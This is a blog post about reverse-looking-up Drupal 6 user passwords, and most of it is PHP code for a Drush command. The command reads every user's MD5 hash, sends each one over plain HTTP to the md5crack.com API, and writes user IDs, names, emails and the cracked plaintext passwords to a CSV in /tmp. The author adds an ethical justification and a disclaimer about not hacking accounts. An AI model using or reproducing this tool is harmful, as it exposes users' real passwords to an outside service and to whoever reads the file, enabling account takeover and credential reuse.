Drupal 6 MD5 Password Reverse Lookup

Drupal 6 MD5 Password Reverse Lookup

The ethics or reverse engineering your users passwords are at best questionable but I have recently had a case to do so ethically as the site used a 3rd party API to which the password was sent when the user logged in to a Drupal 6 site. 

This old system is clearly not very well thought through as it sends un-encrypted user data via http but this is not the point of this post. 

As I needed to get some real data from the API I had no choice to look-up the MD5 hashed passwords form the Drupal 6 database to gather a good batch to work with. 

Please note this is only intended to help people facing similar issues and not designed to hack people's facebook or bank accounts! Use the code below to create a drush command that will write a CSV of user data where the password is reversible. 

You will also need to generate an API key form md5Crack.com and then edit the API key in the code to use this example.  

Below is the code from the Drush file and you can get the full module form my GitHub profile.  

<?php
 
/**
 * Implements hook_drush_command().
 */
function md_reverse_drush_command() {
  $items['md_reverse'] = array(
    'description' => dt('Exports reversable users to a file in the tmp directory'),
  );
  return $items;
}
 
/**
 * Creates a CSV of users who's passwords we were able to reverse lookup
 */
function drush_md_reverse() {
  $sql     = "SELECT uid, name, pass FROM users;";
  $result  = db_query($sql);
  $total   = $result->num_rows !== NULL ?
    $result->num_rows : db_result(db_query("SELECT count(1) FROM users;"));
  $users   = array();
  $i       = 0;
  $cracked = 0;
  $fp      = fopen(
    variable_get('file_directory_temp', '/tmp') . '/md_reverse.csv', 'w'
  );
 
  while ($row = db_fetch_object($result)) {
    $u       = user_load($row->uid);
 
    if (($reverse = md_reverse_md5CrackCom($u->pass)) !== FALSE) {
      $users[$u->uid] = array(
        'uid'      => md_reverse_empty($u->uid),
        'name'     => md_reverse_empty($u->name),
        'mail'     => md_reverse_empty($u->mail),
        'md5'      => md_reverse_empty($u->pass),
        'password' => $reverse,
      );
      fputcsv($fp, (array) $users[$u->uid]);
      $cracked++;
    }
 
    $i++;
    echo "$i / $total \n";
  }
  fclose($fp);
 
  echo "Total passwords cracked: $cracked of $total \n";
}
 
/**
 * returns an empts string if the input is null or false or the input if there
 * is anything positive to return
 * 
 * @param mixed string|bool|NULL $x
 * 
 * @return string
 */
function md_reverse_empty($x) {
  return empty($x) ? '' : $x;
}
 
/**
 * Does an API request to md5crack.com
 * 
 * @param string $md5
 * @return mixed boolean|string
 */
function md_reverse_md5CrackCom($md5) {
  // Variables
  $type   = "crack";
  $apikey = "YOURAPIKEY";
 
  $return = json_decode(
    file_get_contents(
      "http://api.md5crack.com/" . $type . "/" . $apikey . "/" . $md5
    )
  );
 
  echo $return->response . "\n";
 
  if ($return->code == 6) {
    return $return->parsed;
  }
  else {
    return FALSE;
  }
}

Comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
By submitting this form, you accept the Mollom privacy policy.